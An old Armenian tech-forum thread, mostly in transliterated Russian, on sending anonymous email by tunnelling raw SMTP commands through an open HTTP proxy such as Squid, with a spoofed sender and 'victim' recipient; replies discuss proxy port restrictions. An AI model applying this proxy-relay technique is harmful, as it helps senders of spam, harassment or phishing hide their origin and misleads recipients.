Armenian Knowledge Base  

Go Back   Armenian Knowledge Base > Technical sections > Software > Software Security
Register

Reply
 
LinkBack Thread Tools
Old 11.09.2002, 19:58   #1
¡no pasaran!
 
dolphin's Avatar
 
Join Date: 03 2002
Location: localhost
Age: 35
Posts: 540
Downloads: 0
Uploads: 0
Reputation: 13 | 4
Cool Anonymous mail via http proxy server

Nedavno ja obnarujil sposob otsylat' polnostju anonymnye pis'ma, to est' bez registracii IP otpravitelja cherez http proxy server (tested on squid). IP otpravitelja budet IP proxy servera. Esli proxy ne derjit logov to vychislit' optpravitelja nevozmojno.

vot, chto sobstvenno nujno sdelat:

~$ telnet some.proxy.server.net 3128
Connected to some.proxy.server.net (127.128.129.1).
Escape character is '^]'.
POST some.smtp.server.net[/i]:25/]http://some.smtp.server.net:25/ HTTP/1.0
Content-length: 4096

helo gago
mail from: [email protected]
rcpt to: [email protected]
data
From: gago<[email protected]>
To: victim<[email protected]>
Reply-To: "Bill Gates"<[email protected]>
Subject: Have fun



This letter will be sent anonymously!

blah-blah-blah....


.


^]

telnet> q
Connection closed.

-----------------------------------

gde:

some.proxy.server.net - proxy, cherez kotoryj budet posylatsja pis'mo

some.smtp.server.net - smtp server, kotoryj, naprimer, obslujivaet [email protected] ili ljuboj smtp server, kotoryj pozvolit relay.

[email protected] - adres otpravitelja

[email protected] - adres poluchatelja

Rekomendacii:

Viderjat' pauzu posle "Content-length:", chtoby smtp server uspel rugnutsja na neponjatnye emu http headery.

4096 - chislo byte v pis'me, vkljuchaja headery, doljno xotja-by prevyshat' real'noe chislo byte.

Krome perechislennyx headerov posle "data" mojno vkjuchat' ljubye mail headery, ili ne ispol'zovat' nikakix

Dumaju budet neslojno napisat' script ili progu, kotoraja budet otsylat' pochtu takim obrazom.
__________________
[ que fors aus ne le sot riens nee ]
Reply With Quote
Old 11.09.2002, 20:39   #2
Guest
 
Posts: n/a
Downloads:
Uploads:
Post

С нормально настроеным сквидом, который переадресует только хттп и фтп случается следующее..
==============================================
Napalm:~$ telnet 192.168.65.1 3128
Trying 192.168.65.1...
Connected to 192.168.65.1.
Escape character is '^]'.
POST http://napalm.never.land.am:25/ HTTP/1.0
Content-length: 4096

HTTP/1.0 403 Forbidden
Server: Squid/2.4.STABLE4
Mime-Version: 1.0
Date: Wed, 11 Sep 2002 10:28:10 GMT
Content-Type: text/html
Content-Length: 771
Expires: Wed, 11 Sep 2002 10:28:10 GMT
X-Squid-Error: ERR_ACCESS_DENIED 0
X-Cache: MISS from Proxy.Never.Land.AM
Proxy-Connection: close
ERROR: The requested URL could not be retrieved
<H1>ERROR</H1>
<H2>The requested URL could not be retrieved</H2>
<HR>
<P>
While trying to retrieve the URL:
<A HREF="http://napalm.never.land.am:25/">http://napalm.never.land.am:25/</A>
<P>
The following error was encountered:
<UL>
<LI>
<STRONG>
Access Denied.
</STRONG>
<P>

==============================================

А вообще идея отличная!
Good job!
Reply With Quote
Old 11.09.2002, 20:59   #3
¡no pasaran!
 
dolphin's Avatar
 
Join Date: 03 2002
Location: localhost
Age: 35
Posts: 540
Downloads: 0
Uploads: 0
Reputation: 13 | 4
Post

stealth <<

hm.. tvoj proxy rugnulsja ne na sam zapros, a na IP, s kotorogo k nemu obratilis'. Tak on-by otreagiroval na ljuboj zapros. Prover' http_allow v squid.conf
Reply With Quote
Old 11.09.2002, 22:30   #4
Консервативн
 
VX's Avatar
 
Join Date: 01 2002
Location: Кавказская Албания
Posts: 889
Downloads: 0
Uploads: 0
Reputation: 0 | 0
Post

Quote:
Originally posted by DolphiN:
stealth <<

hm.. tvoj proxy rugnulsja ne na sam zapros, a na IP, s kotorogo k nemu obratilis'. Tak on-by otreagiroval na ljuboj zapros. Prover' http_allow v squid.conf
Dolphin v squide napisanno deny !SAFE_PORTS, vot.. ))
Reply With Quote
Old 12.09.2002, 03:06   #5
¡no pasaran!
 
dolphin's Avatar
 
Join Date: 03 2002
Location: localhost
Age: 35
Posts: 540
Downloads: 0
Uploads: 0
Reputation: 13 | 4
Talking

vx << a ty otkuda znaesh'?

all << slovom eta shtuka proverena i rabotaet na proxy serverax, kotorye a) pozvoljajut konnectitsja k nim. b) pozvoljajut delat' zaprosy k nujnym vam smtp serveram i k ix 25-ym portam
Reply With Quote
Old 12.09.2002, 07:08   #6
Guest
 
Posts: n/a
Downloads:
Uploads:
Post

Долф, если ты конечно обратил внимание - запрос шёл на нереальный АЙПИ адрес, то есть логично, что запрос шёл так же с нереального ..
Неужели ты подумал, что я запретил доступ для своей внутренней сетки???
))
Reply With Quote
Old 12.09.2002, 15:32   #7
¡no pasaran!
 
dolphin's Avatar
 
Join Date: 03 2002
Location: localhost
Age: 35
Posts: 540
Downloads: 0
Uploads: 0
Reputation: 13 | 4
Post

vx >> "Dolphin v squide napisanno deny !SAFE_PORTS, vot.. ))"

stealth << ne znaju mojet i zaprretil
A na samom dele vx prav, tvoj proxy ne puskaet connectitsja k nestandartnym http portam, tak chto otkryvaj dostup k !SAFE_PORTS i vpered
Reply With Quote
Old 12.09.2002, 16:04   #8
Студент
 
Join Date: 05 2002
Location: Armenia
Posts: 276
Downloads: 0
Uploads: 0
Reputation: 0 | 0
Post

Moderator: Message byl stert iz-za offtpica
Reply With Quote
Sponsored Links
Reply

Thread Tools


На правах рекламы:
реклама

All times are GMT. The time now is 10:46.


Powered by vBulletin® Copyright ©2000 - 2017, Jelsoft Enterprises Ltd.